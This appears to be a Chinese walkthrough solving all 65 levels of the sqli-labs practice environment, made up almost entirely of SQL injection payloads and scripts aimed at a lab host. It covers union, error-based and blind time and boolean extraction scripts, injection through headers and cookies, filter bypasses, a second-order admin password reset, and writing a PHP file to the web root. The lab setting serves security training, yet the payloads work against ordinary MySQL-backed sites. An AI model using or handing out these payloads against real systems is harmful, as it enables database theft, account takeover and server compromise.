sqli-labs通关记录
环境搭建:https://www.cnblogs.com/kagari/p/11910749.html
总体感受:sqli-labs还是只适合入门
在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag
Less-1
http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23
Less-2
http://172.16.124.149/Less-2/?id=0%20union%20select%201,2,flag%20from%20flag.flag
Less-3
http://172.16.124.149/Less-3/?id=0%27)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-4
http://172.16.124.149/Less-4/?id=0%22)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-5
http://172.16.124.149/Less-5/?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-6
http://172.16.124.149/Less-6/?id=0%22%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-7
secure_file_priv=/var/www/html
/var/www/html root:root 755
/var/www/html/tmp root:root 777
http://172.16.124.149/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20phpinfo();%27%20into%20outfile%20%27/var/www/html/tmp/phpinfo.php%27%23
Less-8
import requests url='http://172.16.124.149/Less-8/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'You are in' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-9
import requests import time url='http://172.16.124.149/Less-9/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23".format(i=i,mid=hex(mid)) t1=time.time() r=requests.get(url=url+payload) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
Less-10
import requests import time url='http://172.16.124.149/Less-10/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid)) t1=time.time() r=requests.get(url=url+payload) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
Less-11
post:
passwd=&uname=' union select 1,(select flag from flag.flag)%23
Less-12
post:
passwd=&uname=") union select 1,(select flag from flag.flag)%23
Less-13
post:
passwd=&uname=') union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-14
post:
passwd=&uname=" union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-15
import requests import time url='http://172.16.124.149/Less-15/' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#".format(i=i,mid=hex(mid)) data={'passwd':'','uname':payload} t1=time.time() r=requests.post(url=url,data=data) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
Less-16
import requests import time url='http://172.16.124.149/Less-16/' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload='")^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#'.format(i=i,mid=hex(mid)) data={'passwd':'','uname':payload} t1=time.time() r=requests.post(url=url,data=data) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
Less-17
post:
passwd='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&uname=Dhakkan
Less-18
POST /Less-18/ HTTP/1.1 Host: 172.16.124.149 Content-Length: 22 Cache-Control: max-age=0 Origin: http://172.16.124.149 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'','')# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://172.16.124.149/Less-18/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close uname=Dumb&passwd=Dumb
Less-19
POST /Less-19/ HTTP/1.1 Host: 172.16.124.149 Content-Length: 22 Cache-Control: max-age=0 Origin: http://172.16.124.149 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'')# Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close uname=Dumb&passwd=Dumb
Less-20
GET /Less-20/ HTTP/1.1 Host: 172.16.124.149 Content-Length: 0 Cache-Control: max-age=0 Origin: http://172.16.124.149 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: Cookie: uname='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))# Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
Less-21
base64编码:')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
GET /Less-21/ HTTP/1.1 Host: 172.16.124.149 Content-Length: 0 Cache-Control: max-age=0 Origin: http://172.16.124.149 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: Cookie: uname=JyleKHNlbGVjdCBjb3VudCgqKSBmcm9tIG15c3FsLnVzZXIgZ3JvdXAgYnkgY29uY2F0KChzZWxlY3QgZmxhZyBmcm9tIGZsYWcuZmxhZyksZmxvb3IocmFuZCgwKSoyKSkpIw== Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
Less-22
base64编码:"^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
GET /Less-22/ HTTP/1.1 Host: 172.16.124.149 Content-Length: 0 Cache-Control: max-age=0 Origin: http://172.16.124.149 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: Cookie: uname=Il4oc2VsZWN0IGNvdW50KCopIGZyb20gbXlzcWwudXNlciBncm91cCBieSBjb25jYXQoKHNlbGVjdCBmbGFnIGZyb20gZmxhZy5mbGFnKSxmbG9vcihyYW5kKDApKjIpKSkj== Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
Less-23
http://172.16.124.149/Less-23/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag;%00
Less-24
由于字段长度限制20位,该题只能做到任意用户密码修改
注册:admin'#/123
登陆后修改密码:current_password=123&password=admin&re_password=admin&submit=Reset
admin的密码变为admin
update语句:UPDATE users SET PASSWORD='admin' where username='admin'#' and password='123'
Less-25
http://172.16.124.149/Less-25/?id=%27%20union%20select%201,flag,3%20from%20flag.flag%23
Less-25a
http://1172.16.124.149/Less-25a/?id=0%20union%20select%201,2,flag%20from%20flag.flag
Less-26
http://172.16.124.149/Less-26/?id=%27%a0union%a0select%a01,flag,3%a0from%a0flag.flag;%00
Less-26a
http://127.0.0.1:8080/Less-26a/?id=0%27)union%a0select%a01,2,flag%a0from%a0flag.flag;%00
Less-27
http://172.16.124.149/Less-27/?id=%27%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-27a
http://172.16.124.149/Less-27a/?id=%22%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-28
http://172.16.124.149/Less-28/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-28a
http://172.16.124.149/Less-28a/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-29
http://172.16.124.149/Less-29/?id=%27%20union%20select%201,flag,3%20from%20flag.flag;%00
Less-30
http://172.16.124.149/Less-30/?id=%22%20union%20select%201,flag,3%20from%20flag.flag%23
Less-31
http://172.16.124.149/Less-31/?id=%22)%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-32
http://172.16.124.149/Less-32/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-33
http://172.16.124.149/Less-33/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-34
post:
passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23
Less-35
http://172.16.124.149/Less-35/?id=0%20union%20select%201,flag,3%20from%20flag.flag%23
Less-36
http://172.16.124.149/Less-36/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-37
post:
passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23
Less-38
http://172.16.124.149/Less-38/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23
Less-39
http://172.16.124.149/Less-39/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23
Less-40
http://172.16.124.149/Less-40/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-41
http://172.16.124.149/Less-41/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23
Less-42
post:
login_password='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login
Less-43
post:
login_password=')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login
Less-44
import requests import time url='http://172.16.124.149/Less-44/login.php' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid)) data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'} t1=time.time() r=requests.post(url=url,data=data) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
Less-45
import requests import time url='http://172.16.124.149/Less-45/login.php' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="')^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid)) data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'} t1=time.time() r=requests.post(url=url,data=data) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
Less-46
http://172.16.124.149/Less-46/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));
Less-47
http://172.16.124.149/Less-47/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23
Less-48
import requests import time url='http://172.16.124.149/Less-48/?sort=1' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'admin' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-49
import requests import time url='http://172.16.124.149/Less-49/?sort=1' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'admin' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-50
http://172.16.124.149/Less-50/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));
Less-51
http://172.16.124.149/Less-51/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23
Less-52
import requests import time url='http://172.16.124.149/Less-52/?sort=1' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'admin' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-53
import requests import time url='http://172.16.124.149/Less-53/?sort=1' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'admin' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-54
http://172.16.124.149/Less-54/index.php?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23
Less-55
http://172.16.124.149/Less-55/?id=0)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-56
http://172.16.124.149/Less-56/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-57
http://172.16.124.149/Less-57/?id=%22%20union%20select%201,2,flag%20from%20flag.flag%23
Less-58
http://172.16.124.149/Less-58/index.php?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-59
http://172.16.124.149/Less-59/?id=0%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-60
http://172.16.124.149/Less-60/?id=%22)%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-61
http://172.16.124.149/Less-61/?id=%27))%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-62
import requests import time url='http://172.16.124.149/Less-62/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="0%27)^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'dhakkan' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-63
import requests import time url='http://172.16.124.149/Less-63/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="0%27^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'dhakkan' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-64
import requests import time url='http://172.16.124.149/Less-64/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload="0))^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'dhakkan' in r.text: left=mid else: right=mid flag+=chr(right) print flag
Less-65
import requests import time url='http://172.16.124.149/Less-65/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload='0")^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23'.format(i=i,mid=hex(mid)) r=requests.get(url=url+payload) if 'dhakkan' in r.text: left=mid else: right=mid flag+=chr(right) print flag
